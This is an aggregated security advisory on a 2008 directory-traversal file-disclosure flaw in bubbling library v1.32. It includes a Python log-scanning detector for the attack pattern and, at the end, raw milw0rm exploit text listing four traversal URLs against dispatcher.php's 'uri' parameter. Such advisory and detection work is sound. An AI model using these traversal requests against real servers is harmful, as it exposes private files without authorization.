Vendor: bubbling library
By: Stack-Terrorist
CVSS: 7.5 (HIGH)
Vulnerability: Remote File Disclosure
CWE: 22
Product Name: bubbling library
Affected Version From: v1.32
Affected Version To: v1.32
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

bubbling library v1.32 Remote File Disclosure Vulnerabilities

A vulnerability in bubbling library v1.32 allows remote attackers to disclose arbitrary files from the server. The cause is a lack of proper input validation in the 'uri' parameter of the 'dispatcher.php' script: an attacker can send a specially crafted HTTP request containing directory traversal sequences (e.g. '../') in that parameter and read the files they point to.
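
Detection example (added here, not part of the original advisory or of the library's code): a Python log check for the request pattern described above, flagging requests to 'dispatcher.php' whose 'uri' parameter decodes to a '..' path segment. It assumes combined-format access logs; the sample log lines, the '/lib' install prefix and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: combined-format access log with a quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A '..' that forms a whole path segment (bounded by a separator or string end).
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_uri(log_line):
    """Return the decoded 'uri' value if the line is a dispatcher.php request
    whose 'uri' parameter contains a '..' path segment, otherwise None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if not target.path.lower().endswith("/dispatcher.php"):
        return None
    # parse_qs performs the first round of percent-decoding.
    for raw in parse_qs(target.query, keep_blank_values=True).get("uri", []):
        value = fully_decode(raw)
        if TRAVERSAL_RE.search(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_uri) for every flagged log line."""
    return [(n, hit) for n, line in enumerate(lines, 1)
            if (hit := suspicious_uri(line)) is not None]

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Jan/2008:10:00:01 +0000] "GET /lib/examples/dispatcher/dispatcher.php?uri=home/index HTTP/1.1" 200 512',
    '192.0.2.44 - - [28/Jan/2008:10:00:07 +0000] "GET /lib/examples/wizard/dispatcher.php?uri=../../file HTTP/1.1" 200 1780',
    '192.0.2.44 - - [28/Jan/2008:10:00:09 +0000] "GET /lib/PHP/dispatcher.php?uri=%2e%2e%2f%2e%2e%2ffile HTTP/1.1" 200 1780',
    '192.0.2.10 - - [28/Jan/2008:10:00:12 +0000] "GET /lib/docs/index.php?uri=../../file HTTP/1.1" 404 210',
    '192.0.2.10 - - [28/Jan/2008:10:00:15 +0000] "GET /lib/PHP/dispatcher.php?uri=v1..2/notes HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for lineno, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: traversal in uri -> {value!r}")
```

Lines 4 and 5 of the sample stay unflagged: one targets a different script, the other contains '..' inside a file name rather than as a path segment.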

Mitigation:

Upgrade to the latest version of bubbling library v1.32 or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

## bubbling library v1.32 Remote File Disclosure Vulnerabilities
## Download script : http://sourceforge.net/project/showfiles.php?group_id=192730
## Author : Stack-Terrorist [v40]
## Email : v.4@hotmail.fr

## Home : http://www.v4-team.com

## exploit :

http://localhost/ [script] /examples/dispatcher/framework/dispatcher.php?uri=../../file

http://localhost/ [script] /examples/dispatcher/dispatcher.php?uri=../../file
http://localhost/ [script] /examples/wizard/dispatcher.php?uri=../../file
http://localhost/ [script] /PHP/dispatcher.php?uri=../../file

Greetz :  H-T Team , v4 Team  , Tryag , no-hack all my friend 
Special tnx for : Houssamix
thx for: Proamk  - djekmani - Jadi - Bohayra - MR.safa7 -Hack3r-b0y - str0ke 

# milw0rm.com [2008-01-28]